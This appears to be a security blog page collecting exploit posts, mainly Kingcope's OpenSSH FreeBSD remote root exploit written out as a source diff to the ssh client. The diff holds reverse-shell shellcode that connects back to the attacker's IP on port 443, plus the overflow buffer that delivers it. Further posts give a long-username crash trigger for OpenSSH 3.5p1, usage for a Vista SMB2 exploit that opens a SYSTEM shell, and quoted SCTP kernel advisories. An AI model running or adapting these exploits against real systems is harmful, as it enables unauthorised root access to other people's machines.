Close Panel

OpenSSH FreeBSD Remote Root Exploit
By Kingcope

Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702
Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924
run like ./ssh -1 -z
setup a netcat, port 443 on yourip first

a statically linked linux binary of the exploit can be found below attached is a diff to openssh-5.8p2. The statically linked binary can be downloaded from

I know these versions are really old, some seem to run that tough.

-Cheers, King “the archaeologist” Cope

diff openssh-5.8p2/ssh.c openssh-5.8p2_2/ssh.c
> char *myip;
> "OpenSSH FreeBSD Remote Root Exploit\n"
> "By Kingcope\n"
> "Year 2011\n\n"
> "Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702\n"
> "Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924\n"
> "run like ./ssh -1 -z \n"
> "setup a netcat, port 443 on yourip first\n\n"
< while ((opt = getopt(ac, av, "1246ab:c:e:fgi:kl:m:no:p:qstvx"
> while ((opt = getopt(ac, av, "1246ab:c:e:fgi:kl:m:no:z:p:qstvx"
> break;
> case 'z':
> myip = optarg;
diff openssh-5.8p2/sshconnect1.c openssh-5.8p2_2/sshconnect1.c
> //IP=\xc0\xa8\x20\x80
> #define IPADDR "\xc0\xa8\x20\x80"
> #define PORT "\x27\x10" /* htons(10000) */
> char sc[] =
> "\x90\x90"
> "\x90\x90"
> "\x31\xc9" // xor ecx, ecx
> "\xf7\xe1" // mul ecx
> "\x51" // push ecx
> "\x41" // inc ecx
> "\x51" // push ecx
> "\x41" // inc ecx
> "\x51" // push ecx
> "\x51" // push ecx
> "\xb0\x61" // mov al, 97
> "\xcd\x80" // int 80h
> "\x89\xc3" // mov ebx, eax
> "\x68"IPADDR // push dword 0101017fh
> "\x66\x68"PORT // push word 4135
> "\x66\x51" // push cx
> "\x89\xe6" // mov esi, esp
> "\xb2\x10" // mov dl, 16
> "\x52" // push edx
> "\x56" // push esi
> "\x50" // push eax
> "\x50" // push eax
> "\xb0\x62" // mov al, 98
> "\xcd\x80" // int 80h
> "\x41" // inc ecx
> "\xb0\x5a" // mov al, 90
> "\x49" // dec ecx
> "\x51" // push ecx
> "\x53" // push ebx
> "\x53" // push ebx
> "\xcd\x80" // int 80h
> "\x41" // inc ecx
> "\xe2\xf5" // loop -10
> "\x51" // push ecx
> "\x68\x2f\x2f\x73\x68" // push dword 68732f2fh
> "\x68\x2f\x62\x69\x6e" // push dword 6e69622fh
> "\x89\xe3" // mov ebx, esp
> "\x51" // push ecx
> "\x54" // push esp
> "\x53" // push ebx
> "\x53" // push ebx
> "\xb0\xc4\x34\xff"
> "\xcd\x80"; // int 80h
> extern char *myip;
> char buffer[100000];
> printf("OpenSSH Remote Root Exploit\n");
> printf("By Kingcope\n");
> printf("Year 2011\n\n");
> printf("Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702\n");
> printf("Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924\n");
> printf("Connect back to: %s:443\n", myip);
> *((unsigned long*)(sc + 21)) = inet_addr(myip);
> *((unsigned short*)(sc + 27)) = htons(443);
> memset(buffer, 'V', 8096);
> memcpy(buffer+24, "\x6b\x4b\x0c\x08", 4); // SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702
> memset(buffer+28, '\x90', 65535);
> memcpy(buffer+28+65535, sc, sizeof(sc));
> server_user=buffer;





OpenSSH 3.5p1 Remote Root Exploit for FreeBSD

By IPSECS Admin. Posted in News | No Comments »

OpenSSH 3.5p1 Remote Root Exploit for FreeBSD
Discovered and Exploited By Kingcope – 2011

The last two days I have been investigating a vulnerability in OpenSSH affecting at least FreeBSD 4.9 and 4.11. These FreeBSD versions run OpenSSH 3.5p1 in the default install.  The sshd banner for 4.11-RELEASE is:
"SSH-1.99-OpenSSH_3.5p1 FreeBSD-20060930".

A working Remote Exploit which spawns a root shell remotely and previous to authentication was developed.  The bug can be triggered both through ssh version 1 and ssh version 2 using a modified ssh client. During the investigation of the vulnerability it was found that the bug resides in the source code file “auth2-pam-freebsd.c”.

This file does not exist in FreeBSD releases greater than 5.2.1. The last commit is from 7 years ago.  Specifically the bug follows a code path in the PAM Authentication Thread inside this source code, “pam_thread()”. It could not be verified if the bug is inside this
(third party, freebsd) OpenSSH code or in the FreeBSD pam library itself.

Both the challenge response (ssh version 1) and keyboard interactive via pam (ssh version 2) authentications go through this code path.  By supplying a long username to the daemon the sshd crashes.

h4x# sysctl kern.sugid_coredump=1
kern.sugid_coredump: 0 -> 1
root@debian:~# ssh -l`perl -e 'print "A" x 100'`
h4x# tail -1 /var/log/messages
Jun 30 16:01:25 h4x /kernel: pid 160 (sshd), uid 0: exited on signal 11 (core dumped)

Looking into the coredump reveals:

h4x# gdb -c /sshd.core
GNU gdb 4.18 (FreeBSD)
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-unknown-freebsd".
Core was generated by `sshd'.
Program terminated with signal 11, Segmentation fault.
#0  0x28092305 in ?? ()
(gdb) x/1i $eip
0x28092305:     (bad)

The sshd crahes at a place with illegal instructions. It looks like it depends on how the sshd is started. Starting the sshd from the console as root and running the ssh client with long username again reveals:

Read more »





Remote SMB Exploit for Vista SP1/SP2

By IPSECS Admin. Posted in Exploitation, News | No Comments »

It has been while story about SMB version 2 vulnerability since this post. Finally public exploit to take over control windows vista SP1 and SP2 are out! You can catch the exploit at exploit-db.

Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference

Exploited by Piotr Bania //
Exploit for Vista SP2/SP1 only, should be reliable!

Tested on:
Vista sp2 (6.0.6002.18005)
Vista sp1 ultimate (6.0.6001.18000)

Kudos for:
Stephen, HDM, Laurent Gaffie(bug) and all the mates i know, peace.
Special kudos for prdelka for testing this shit and all the hosters.

Sample usage

> smb2_exploit.exe 45 0
> telnet 28876

Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation.  All rights reserved.

nt authority\system

When all is done it should spawn a port TARGET_IP:28876

This exploit was created almost a year ago and wasnt modified from that time
whatsoever. The vulnerability itself is patched for a long time already so
i have decided to release this little exploit. You use it for your own
responsibility and im not responsible for any potential damage this thing
can cause. Finally i don't care whether it worked for you or not.

P.S the technique itself is described here:


For your information, two days later at 19th August 2010, Kingcope released root exploit for FreeBSD 8.x and 7.x by poisoning mbufs() function. You may download Kingcope’s exploit here. Now happy exploiting while waiting “SAHUR” guys!





Linux Kernel 2.6.x SCTP FWD Memory Corruption

By IPSECS Admin. Posted in Exploitation | Comments Off

Common Vulnerabilities and Exposures

“Buffer overflow in net/sctp/sm_statefuns.c in the Stream Control Transmission Protocol (sctp) implementation in the Linux kernel before 2.6.28-git8 allows remote attackers to have an unknown impact via an FWD-TSN (aka FORWARD-TSN) chunk with a large stream ID. “

Ubuntu Security Notice USN-751-1

“The SCTP stack did not correctly validate FORWARD-TSN packets. A remote attacker could send specially crafted SCTP traffic causing a system crash, leading to a denial of service. (CVE-2009-0065)”

RedHat Security Advisory

“a buffer overflow was found in the Linux kernel Partial Reliable Stream Control Transmission Protocol (PR-SCTP) implementation. This could, potentially, lead to a denial of service if a Forward-TSN chunk is received with a large stream ID. (CVE-2009-0065, Important) ”

Read more »